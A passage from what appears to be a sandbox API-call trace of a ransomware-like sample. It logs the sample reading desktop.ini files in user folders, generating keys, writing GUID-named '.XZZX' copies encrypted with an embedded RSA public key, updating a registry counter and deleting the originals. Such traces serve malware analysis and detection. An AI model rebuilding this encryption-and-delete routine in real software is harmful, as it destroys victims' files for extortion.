lpDistanceToMoveHigh=0x0) returned 0x11f [0044.901] WriteFile (in: hFile=0x528, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0044.901] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x135 [0044.901] WriteFile (in: hFile=0x528, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.901] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13a [0044.901] SetErrorMode (uMode=0x1) returned 0x1 [0044.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0044.902] OutputDebugStringW (lpOutputString="end") [0044.902] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0044.902] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0044.902] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5648) returned 1 [0044.903] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5648, dwCertEncodingType=0x1, pInfo=0x3e3ff20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3ff50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3ff58*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5a50) returned 1 [0044.903] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.903] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0044.903] CryptEncrypt (in: hKey=0x42e5a50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0044.903] CryptEncrypt (in: hKey=0x42e5a50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d56d0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d56d0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0044.903] WriteFile (in: hFile=0x528, lpBuffer=0x42d56d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d56d0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0044.903] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0044.904] WriteFile (in: hFile=0x528, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.904] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0044.904] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0044.904] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x534) returned 0x0 [0044.904] RegQueryValueExW (in: hKey=0x534, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3c, lpcbData=0x417dfdc*=0x4) returned 0x0 [0044.904] RegCloseKey (hKey=0x534) returned 0x0 [0044.904] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x534) returned 0x0 [0044.904] RegSetValueExW (in: hKey=0x534, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3d, cbData=0x4 | out: lpData=0x417dfec*=0x3d) returned 0x0 [0044.904] RegCloseKey (hKey=0x534) returned 0x0 [0044.904] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.905] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.905] CloseHandle (hObject=0x528) returned 1 [0044.906] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0044.906] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0044.906] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini")) returned 1 [0044.907] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini")) returned 0 Thread: id = 156 os_tid = 0x924 [0044.929] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.929] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.929] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0044.929] SetErrorMode (uMode=0x1) returned 0x1 [0044.930] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.930] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xa510518b, Data2=0x6e29, Data3=0x4ff9, Data4=([0]=0x8e, [1]=0x1a, [2]=0x54, [3]=0xbe, [4]=0xaf, [5]=0x74, [6]=0xa1, [7]=0xf3))) returned 0x0 [0044.930] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0044.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.930] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\72A6C9432269CCE1A510518B2681B129.XZZX") returned 81 [0044.930] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0044.930] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", dwFileAttributes=0x20) returned 1 [0044.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534 [0044.930] ReadFile (in: hFile=0x534, lpBuffer=0x42e4d18, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e4d18*, lpNumberOfBytesRead=0x417e418*=0x192, lpOverlapped=0x0) returned 1 [0044.931] CloseHandle (hObject=0x534) returned 1 [0044.931] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0044.931] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0044.931] SetErrorMode (uMode=0x1) returned 0x1 [0044.932] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0044.932] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5758) returned 1 [0044.934] CryptGenKey (in: hProv=0x42d5758, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f90) returned 1 [0045.068] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.068] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.068] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.069] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.069] CryptDestroyKey (hKey=0x42e4f90) returned 1 [0045.069] CryptReleaseContext (hProv=0x42d5758, dwFlags=0x0) returned 1 [0045.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\72A6C9432269CCE1A510518B2681B129.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\72a6c9432269cce1a510518b2681b129.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534 [0045.069] WriteFile (in: hFile=0x534, lpBuffer=0x42e4d18*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e4d18*, lpNumberOfBytesWritten=0x417e438*=0x192, lpOverlapped=0x0) returned 1 [0045.070] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x192 [0045.070] WriteFile (in: hFile=0x534, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.070] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0045.070] WriteFile (in: hFile=0x534, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0045.070] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1ad [0045.070] WriteFile (in: hFile=0x534, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.070] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1b2 [0045.070] SetErrorMode (uMode=0x1) returned 0x1 [0045.070] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.070] OutputDebugStringW (lpOutputString="end") [0045.070] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.070] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.070] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5758) returned 1 [0045.071] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5758, dwCertEncodingType=0x1, pInfo=0x3e3fff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40028*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5cd0) returned 1 [0045.071] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.072] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.072] CryptEncrypt (in: hKey=0x42e5cd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.072] CryptEncrypt (in: hKey=0x42e5cd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d57e0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d57e0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.072] WriteFile (in: hFile=0x534, lpBuffer=0x42d57e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d57e0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.072] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.072] WriteFile (in: hFile=0x534, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.072] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.072] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.072] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x540) returned 0x0 [0045.073] RegQueryValueExW (in: hKey=0x540, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3d, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.073] RegCloseKey (hKey=0x540) returned 0x0 [0045.073] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x540) returned 0x0 [0045.073] RegSetValueExW (in: hKey=0x540, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3e, cbData=0x4 | out: lpData=0x417dfec*=0x3e) returned 0x0 [0045.073] RegCloseKey (hKey=0x540) returned 0x0 [0045.073] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.073] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.074] CloseHandle (hObject=0x534) returned 1 [0045.074] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.075] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.075] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini")) returned 1 [0045.075] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini")) returned 0 Thread: id = 157 os_tid = 0x994 [0045.085] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.085] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.085] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.085] SetErrorMode (uMode=0x1) returned 0x1 [0045.085] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.085] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x59bc413e, Data2=0xe276, Data3=0x4dd7, Data4=([0]=0xbd, [1]=0xb8, [2]=0x6b, [3]=0xe4, [4]=0xd2, [5]=0x71, [6]=0x34, [7]=0x6e))) returned 0x0 [0045.085] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0045.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.085] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned 87 [0045.085] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0045.085] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x20) returned 1 [0045.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540 [0045.085] ReadFile (in: hFile=0x540, lpBuffer=0x341eb8, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x341eb8*, lpNumberOfBytesRead=0x417e418*=0x50, lpOverlapped=0x0) returned 1 [0045.086] CloseHandle (hObject=0x540) returned 1 [0045.086] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.087] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.087] SetErrorMode (uMode=0x1) returned 0x1 [0045.087] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.087] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5868) returned 1 [0045.089] CryptGenKey (in: hProv=0x42d5868, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e53d0) returned 1 [0045.177] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.177] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.177] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.178] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.178] CryptDestroyKey (hKey=0x42e53d0) returned 1 [0045.178] CryptReleaseContext (hProv=0x42d5868, dwFlags=0x0) returned 1 [0045.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8E5ECE9444DBAF1A59BC413E48F39362.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\8e5ece9444dbaf1a59bc413e48f39362.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540 [0045.185] WriteFile (in: hFile=0x540, lpBuffer=0x341eb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x341eb8*, lpNumberOfBytesWritten=0x417e438*=0x50, lpOverlapped=0x0) returned 1 [0045.186] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0045.186] WriteFile (in: hFile=0x540, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.186] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x55 [0045.186] WriteFile (in: hFile=0x540, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0045.187] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: 